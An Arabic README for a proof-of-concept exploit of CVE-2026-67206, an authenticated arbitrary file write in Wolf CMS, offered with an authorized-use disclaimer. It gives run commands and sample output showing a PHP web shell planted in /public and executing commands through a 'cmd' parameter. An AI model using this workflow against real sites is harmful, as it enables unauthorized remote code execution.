
استغلال PoC لنظام Wolf CMS <= 0.8.3.1: يصادق على حساب Admin، ويكتب ملف PHP تعسفيًا إلى /public عبر FileManagerController، وينفّذ الأوامر من خلال قشرة ويب.
يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال ثغرة CVE-2026-67206
هذا المشروع مقدم لأغراض تعليمية وللاختبارات الأمنية المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.
توجد ثغرة كتابة ملفات عشوائية في إصدارات Wolf CMS حتى 0.8.3.1. تسمح للمهاجم المصادق بكتابة ملفات عشوائية خبيثة إلى دليل /public في جذر الويب عبر دالتي create_file() و save() في ملف FileManagerController.php. لا تتحقق دالة create_file() في FileManagerController.php من امتدادات الملفات، مما يسمح للمهاجمين المصادقين بكتابة نصوص PHP خبيثة والحصول على صلاحيات تنفيذ الأكواد عن بُعد.
يمكن العثور على تقرير تفصيلي مع تحليل الكود المصدري وعرض توضيحي للاستغلال على مدونتي على Medium.
جميع إصدارات Wolf CMS حتى 0.8.3.1 متأثرة. تمت أرشفة مستودع Wolf CMS اعتبارًا من 28 أغسطس 2021 ولم يعد يُصان بنشاط. لا توجد حاليًا أي تصحيحات لهذه الثغرة.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data